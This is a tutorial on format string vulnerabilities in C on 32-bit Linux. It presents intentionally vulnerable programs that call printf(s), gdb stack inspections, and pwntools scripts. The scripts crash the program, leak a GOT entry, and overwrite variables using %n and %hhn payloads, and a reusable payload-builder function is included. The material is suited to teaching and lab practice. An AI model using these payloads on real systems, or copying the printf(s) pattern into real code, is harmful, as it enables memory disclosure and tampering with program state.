Format String Vulnerability Intro

The format string in many programming languages, refers to a control parameter used by a class of functions. It helps to output text in specific format, according to conversion specification or format specifiers that user set.

Here we discuss it on Linux.

Format String Introduction

For C format string functions, characters are usually copied literally into the function’s output, but format specifiers, which start with a % character, indicate the location and method to translate a piece of data (such as a number) to characters.

We take printf as an example.
example

Format string functions include:

method name	method function
scanf	scan input format string
printf	output to stdout
fprintf	output to FILE stream
vprintf	output to stdout according to parameter list
vfprintf	output to FILE stream according to parameter list
sprintf	output to string
snprintf	output assigned number chars to string
vsprintf	output to string according to parameter list
vsnprintf	output specified number chars to string according to …
setproctitle	set argv
syslog	output log
err, verr, warn, vwarn, etc.	error and warning output

Basic format is %[parameter][flags][field width][.precision][length]type, and you can check this site for meanings of every patterns.

Things we need to focus on:

parameter
- n$: get specific parameter in format string
flag
field width
- minimum width to output
precision
- maximum width to output
length
- hh: output a byte
- h: Output a double byte
type
- d/i: signed int
- u: unsigned int
- x/X: hex unsigned int
- o: octal unsigned int
- s: string (var assigns start address)
- c: character
- p: variable address
- n: number of written chars
- %: just %

Vulnerability Principle

The printf reads given characters one by one.

If not %, output to stdout.
If % appears, read next,
- If no chars following, error report.
- If % appears, output %.
- If other chars show up, analyze and output according to the parameters.

If we write printf wrongly like:

1	printf("Color %s, Number %d, Float %4.2f");

Without any following parameters, printf will get variables from the stack memory (from top of the stack to bottom).
For one thing, if it reads illegal data, the program crashes; for another thing, the output can be regarded as stack data leaking.

Format String Exploit

Vulnerability comes with incorrect usage, like no parameters given after the format specifiers.

Here is a vulnerable code sample (fmtstr.c):

#include <stdio.h>
int a = 123,b = 456;
int main(){
        int c = 789;
        char s[100];
        puts("input:");
        scanf("%s", s);
        puts("output:");
        printf(s);      //vulnerable
        return 0;
}

And the instruction to compile (we start from 32-bit, and no protection program):

1	$ gcc -m32 -fno-stack-protector -no-pie -o fmtstr fmtstr.c

There are 3 ways to exploit:

program crashing
memory data leaking
memory data overwriting

Crash program

Use lots of %s to let program read many undefined memory areas is the easist way.
This may not let you control program, but crashing remote service contributes to attacks like denial of service.

But have you ever considered, how many %s are enough? and why?
We play with fmtstr that is compiled above. The relationship between inputs and outputs is:

Input	Output
%s%s%s	%s%s%sW.
%s%s%s%s%s	%s%s%s%s%sW.(null)(null)
%s%s%s%s%s%s…	Segmentation fault

USe gdb to analyze. Set a breakpoint to debug.

$ gdb fmtstr -q
GEF for linux ready, type 'gef' to start, 'gef config' to configure
88 commands loaded for GDB 9.2 using Python engine 3.8
Reading symbols from fmtstr...
(No debugging symbols found in fmtstr)
gef➤  b printf
Breakpoint 1 at 0x8049030
gef➤  r
Starting program: /root/fmtstr
input:
%s%s%s          # my input
output:

Breakpoint 1, 0xf7e31a90 in printf () from /lib/i386-linux-gnu/libc.so.6
...

Let’s look at the stack, since this vulnerability comes from no following parameters for potential format specifiers, so the format string functions will take parameters from stack.

────────────────── stack ────
0xffffd38c│+0x0000: 0x080491fc  →  <main+106> add esp, 0x10     ← $esp
0xffffd390│+0x0004: 0xffffd3a8  →  "%s%s%s"
0xffffd394│+0x0008: 0xffffd3a8  →  "%s%s%s"     # 1st
0xffffd398│+0x000c: 0xf7ffd940  →  0x00000000   # 2nd
0xffffd39c│+0x0010: 0x080491a9  →  <main+23> add ebx, 0x2e57    # 3rd
0xffffd3a0│+0x0014: 0x00000000      # 4th
0xffffd3a4│+0x0018: 0x00000000      # 5th
0xffffd3a8│+0x001c: "%s%s%s"        # 6th
...
───────────────────

The current top of stack is 0xffffd38c, storing esp. Value in 0xffffd390 is 1st parameter of printf function, while value in 0xffffd394 is 1st parameter of format string (2nd parameter of printf).

We use %s to output what the values saved in stack point to (regard values in stack as string starting addresses). Let’s see what exactly do they point to.

gef➤  x/x xffffd3a8
0xffffd3a8:     0x73257325  
gef➤  x/x 0xf7ffd940
0xf7ffd940:     0x00000000
gef➤  x/x 0x080491a9
0x80491a9 <main+23>:    0x2e57c381
gef➤  x/x 0x00000000
0x0:    Cannot access memory at address 0x0
gef➤  x/x "%s%s%s"        # the 6th parameter for format string 
0xf7fce670:     0x73257325
gef➤  x/x %s%s%s
A syntax error in expression, near '%s%s%s'.
gef➤  x/x 0xffffd3a8
0xffffd3a8:     0x73257325
gef➤  x/x 0x73257325
0x73257325:     Cannot access memory at address 0x73257325
gef➤  c
Continuing.
%s%s%sW.
[Inferior 1 (process 1419) exited normally]

The above are display of 1st, 2nd, 3rd, 4th … parameter that in order.
Normally values in stack will change on different pc, and different time to run. We can see that our input is 6th parameter, however this is fixed, because this order is determined by order of program instructions.

Here we can also know how many %s are enough to crash it. Each %s we feed will print a item on the stack, and when the item (regarded as address) points to somewhere inaccessible, program breaks down.

As we can see, though 4th and 5th parameter are 0x00000000 which points to a definitely inaccessible place, they are translated as pointing to null. So the first parameter that causes crashing is actually 6th item. If you notice, it happens to be the input string.
So the answer is, 6 %s is just enough (the more the better).

Leak Memory

It includes the following operations.

Leak stack memory data
- Get variable value
- Get memory that var value (address) points to
Leak any address data
- Use GOT to get libc addr
- To dump all the program

The basic principle is using format like %n$p or %n$x, even %n$s to leak data in stack memory. %p is a better choice than %x to print data, because %x will print different content in 32-bit and 64-bit environments.

Leak Stack

The format string %order$p refers to printing the number order format string parameter. We can use %10000000$p to leak 10000000th parameter, instead of using 10,000,000 %p like what former section does. In theory, we can disclose whatever item on stack.

Run fmtstr to show the effect. I feed %6$p to leak input string.

$ gdb fmtstr -q
GEF for linux ready, type 'gef' to start, 'gef config' to configure
88 commands loaded for GDB 9.2 using Python engine 3.8
Reading symbols from fmtstr...
(No debugging symbols found in fmtstr)
gef➤  b printf
Breakpoint 1 at 0x8049030
gef➤  r
Starting program: /root/fmtstr
input:
%6$p
output:

Breakpoint 1, 0xf7e31a90 in printf () from /lib/i386-linux-gnu/libc.so.6
[ Legend: Modified register | Code | Heap | Stack | String ]
...
─────────────────── stack ────
0xffffd39c│+0x0000: 0x080491fc  →  <main+106> add esp, 0x10     ← $esp
0xffffd3a0│+0x0004: 0xffffd3b8  →  "%6$p"
0xffffd3a4│+0x0008: 0xffffd3b8  →  "%6$p"       # 1st
0xffffd3a8│+0x000c: 0xf7ffd940  →  0x00000000   # 2nd
0xffffd3ac│+0x0010: 0x080491a9  →  <main+23> add ebx, 0x2e57    # 3rd
0xffffd3b0│+0x0014: 0x00000000      # 4th
0xffffd3b4│+0x0018: 0x00000000      # 5th
0xffffd3b8│+0x001c: "%6$p"          # 6th
─────────────────── 
...
gef➤  c
Continuing.
0x70243625          # "%6$p" ascii codes
[Inferior 1 (process 176) exited normally]

%p is used to print pointers, %x is used to print data in hex, while %s prints what a pointer points to. so we can use it to do more creative things.

Leak Any

Now we can find our input in stack, and we have %s to leak what a pointer points to. What if we input address to be a pointer, and use %s to leak where it points? In theory, we can leak anywhere.

The basic exploit format is addr%order$s. As the address is hard to input in stdin, so I choose pwntools to do this.
Choosing __isoc99_scanf@got as the aim to leak is to prove the ability of leaking anywhere. The exploit script leakanywhere.py is:

from pwn import *
sh = process('./fmtstr')
fmts = ELF('./fmtstr')
__isoc99_scanf_got = fmts.got['__isoc99_scanf'] # get `got` address of `scanf`
print hex(__isoc99_scanf_got)
payload = p32(__isoc99_scanf_got) + '%6$s'      # building payload
print payload
gdb.attach(sh)                                  # gdb debug
print sh.recv()
sh.sendline(payload)
recv = sh.recv()
print '--------------------------'
print recv
print '--------------------------'
print 'scanf@got is: '+hex(u32(recv[12:16]))    # get leaked 'got' item content
sh.interactive()

The result of running it:

$ python leakanywhere.py 
[+] Starting local process './fmtstr': pid 2770
[*] '/mnt/hgfs/Sandbox/fmtstr'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
0x804c01c
\x1c\x04%6$s
[*] running in new terminal: /usr/bin/gdb -q  "./fmtstr" 2770
[+] Waiting for debugger: Done
input:

--------------------------
output:
\x1c\x04\x90j��

--------------------------
scanf@got is: 0xf7d76a90
[*] Switching to interactive mode
[*] Process './fmtstr' stopped with exit code 0 (pid 2770)
[*] Got EOF while reading in interactive
$

The address 0xf7d76a90 seems to be what scanf@got points to (where scanf really is). It changes everytime you run the script.

Overwrite Memory

Another impressive format specifier is %n, outputting not characters, but number of successfully printed characters. This provides us with a new method to write things to assigned place.
The basic principle of overwrite memory is using format like ...[overwrite addr]....%[overwrite offset]$n, and the ... means padding we need to make a certain amount for output.

We write overwrite.c as an example to better find out what we can do:

#include <stdio.h>
int a = 123, b = 456;
int main(){
        int c = 789;
        char s[100];
        printf("%p\n", &c);
        puts("input:");
        scanf("%s", s);
        printf(s);
        puts("----------------");
        if(c == 16){
                puts("Path 1");
        }else if(a == 2){
                puts("Path 2");
        }else if(b == 0xdeadbeef){
                puts("Path 3");
        }
        return 0;
}

Compile it (32-bit makes it easier to analyze, because 64-bit program saves first 6 args in registers on Linux).

1	$ gcc -m32 -o overwrite overwrite.c -no-pie

Basic

The first aim is to reach Path 1. As ASLR is enabled, address of variable on stack like c changes each turn, so here I give address of c intentionally.

Since we need to write 16 to c, it requires address of c that we already got, and the order of our input. The exploit will be built like: [addr][padding]%order$n.

Determine the order.

gdb ./overwrite -q
GEF for linux ready, type 'gef' to start, 'gef config' to configure
88 commands loaded for GDB 9.2 using Python engine 3.8
Reading symbols from ./overwrite...
(No debugging symbols found in ./overwrite)
gef➤  b printf
Breakpoint 1 at 0x1030
gef➤  r
Starting program: /root/overwrite
...
gef➤  c
Continuing.
0xffffd41c
input:
%p%p%p%p%p%p

Breakpoint 1, 0xf7e31a90 in printf () from /lib/i386-linux-gnu/libc.so.6
[ Legend: Modified register | Code | Heap | Stack | String ]
...
──────────────────── stack ────
0xffffd39c│+0x0000: 0x56556227  →  <main+110> add esp, 0x10      ← $esp
0xffffd3a0│+0x0004: 0xffffd3b8  →  "%p%p%p%p%p%p"
0xffffd3a4│+0x0008: 0xffffd3b8  →  "%p%p%p%p%p%p"
0xffffd3a8│+0x000c: 0xf7ffd940  →  0x56555000  →  0x464c457f
0xffffd3ac│+0x0010: 0x565561d0  →  <main+23> add ebx, 0x2e30
0xffffd3b0│+0x0014: 0x00000000
0xffffd3b4│+0x0018: 0x00000000
0xffffd3b8│+0x001c: "%p%p%p%p%p%p"
...
─────────────────────────
gef➤

our input %p%p%p%p%p%p is the 6th parameter of format string (7th parameter of func printf), so order should be 6. The addr will be in received contents, so the exploit script goes like:

from pwn import *
sh = process('./overwrite')
recv1 = sh.recvuntil('\n', drop=True)
print recv1
c_addr = int(recv1, 16)
payload = p32(c_addr) + '%012d' + '%6$n'
print payload
#gdb.attach(sh)
sh.sendline(payload)
sh.recv()
sh.interactive()

Finally reach the Path 1.

$ python path1.py
[+] Starting local process './overwrite': pid 660
0xffda4b2c
,K%012d%6$n
[*] Switching to interactive mode
[*] Process './overwrite' stopped with exit code 0 (pid 660)
,K-00002471224----------------
Path 1
[*] Got EOF while reading in interactive
$

Here we use %012d instead of concrete 12 letters, to show more possibilities. When running, %012d will be replaced by 12 integers and

Advanced

Though the [addr][padding]%order$s is enough for Path 1, what about Path 2 and Path 3?

For Path 2 we have to set variable a to be 2. If we still using format [addr][padding]%order$s, even if [addr] part is beyond 4 characters.

Actually it is flexible. Put [addr] back to build aa%order$n[padding][addr], then determine order, [padding] and [addr].

First check the stack

$ gdb ./overwrite -q
...
gef➤  c
Continuing.
0xffffd41c
input:
abcdefghqwerasdf

Breakpoint 1, 0xf7e31a90 in printf () from /lib/i386-linux-gnu/libc.so.6
[ Legend: Modified register | Code | Heap | Stack | String ]
...
──────────────────── stack ────
0xffffd39c│+0x0000: 0x56556227  →  <main+110> add esp, 0x10      ← $esp
0xffffd3a0│+0x0004: 0xffffd3b8  →  "abcdefghqwerasdf"
0xffffd3a4│+0x0008: 0xffffd3b8  →  "abcdefghqwerasdf"
0xffffd3a8│+0x000c: 0xf7ffd940  →  0x56555000  →  0x464c457f
0xffffd3ac│+0x0010: 0x565561d0  →  <main+23> add ebx, 0x2e30
0xffffd3b0│+0x0014: 0x00000000
0xffffd3b4│+0x0018: 0x00000000
0xffffd3b8│+0x001c: "abcdefghqwerasdf"
───────────────────────────
gef➤  x/x 0xffffd3b8
0xffffd3b8:     0x64636261      # `abcd` in little-endian
gef➤  x/x 0xffffd3bc
0xffffd3bc:     0x68676665      # `efgh` 
gef➤  x/x 0xffffd3c0
0xffffd3c0:     0x72657771      # `qwer`
gef➤  x/x 0xffffd3c4
0xffffd3c4:     0x66647361      # `asdf`
gef➤

The aa%order occupies 6th parameter (item), the $n[padding] should form 7th parameter so that leave [addr] to be 8th parameter too.
Therefore order is 8 and [padding] should be 2 chars.
variable a addr
As a is a global variable in .data section, and we use -no-pie to make base address static, so its address 0x00004024 is changeless. So final exploit should be: aa%8$nxx plus 0x00004024. Still need pwntools:

from pwn import *
sh = process('./overwrite')
a_addr = 0x0804C024
payload = 'aa%8$nxx' + p32(a_addr)
sh.sendline(payload)
print sh.recv()
sh.interactive()

Finally reach the Path 2.

$ python path2.py
[+] Starting local process './overwrite': pid 411
[*] Process './overwrite' stopped with exit code 0 (pid 411)
0xffea723c
input:
aaaa$----------------
Path 2

[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$

The last challenge is Path 3 with a huge number to meet. If we also use padding, pretty much padding it is an unlikely successful exploit.
Here introduces hh and h, so what is the point of the h and hh modifiers for printf format specifiers?

h: it stands for a half.

Speciﬁes that a following d, i, o, u, x, or X conversion speciﬁer applies to a short int or unsigned short int argument (the argument will have been promoted according to the integer promotions, but its value shall be converted to short int or unsigned short int before printing); or that a following n conversion speciﬁer applies to a pointer to a short int argument.

hh: it stands for, as a historical guess, for half of a half.

Change short in h explanation to char.

After combining with %n, use %hhn to output a char size (1 bytes), use %hn to output a short size (2 bytes). Path 3 needs b to be 0xdeadbeef, so we can fill the bytes one by one to form a coherent 0xdeadbeef.
variable a addr
First get b address: 0x0804C028. Then we cover memory as follows:

address     hex      decimal
0x0804C028  \xef     # 239
0x0804C029  \xbe     # 190
0x0804C02a  \xad     # 173
0x0804C02b  \xde     # 222

we still remember that the order is 6. Build the payload now:

1
2
3

# since \xad < \xbe < \xde < \xef
# so overwrite order is unique, from smaller to the larger
p32(0x0804C02a)+p32(0x0804C029)+p32(0x0804C02b)+p32(0x0804C028)+'%157c'+'%6$hhn'+'%17c'+'%7$hhn'+'%32c'+'%8$hhn'+'%17c'+'%9$hhn'

This is my solution, while I find another clever choice, which gives a method for all this kind of problems (similar to fmtstr_payload in pwntools):

def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr
def fmt_str(offset, size, addr, target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i*8) & 0xff, offset + i)
        prev = (target>> i*8) & 0xff
    return payload

payload = fmt_str(6,4,0x0804C028,0xdeadbeef)
# `6` represents `order`
# `4` represents `32-bit`
# `0x0804C028` indicates start address
# `0xdeadbeef` indicates what to write

Here comes the script to reach Path 3:

from pwn import *
...
sh = process('./overwrite')
payload = fmt_str(6,4,0x0804C028,0xdeadbeef)
# or
payload = p32(0x0804C02a)+p32(0x0804C029)+p32(0x0804C02b)+p32(0x0804C028)+'%157c'+'%6$hhn'+'%17c'+'%7$hhn'+'%32c'+'%8$hhn'+'%17c'+'%9$hhn'
sh.sendline(payload)
print sh.recv()
sh.interactive()

And the result:

$ python path3.py
[+] Starting local process './overwrite': pid 1327
[*] Process './overwrite' stopped with exit code 0 (pid 1327)
0xff92fc2c
input:
*)+(                                                                                                                                                                            @                               \x99                \x00---------------
Path 3

[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$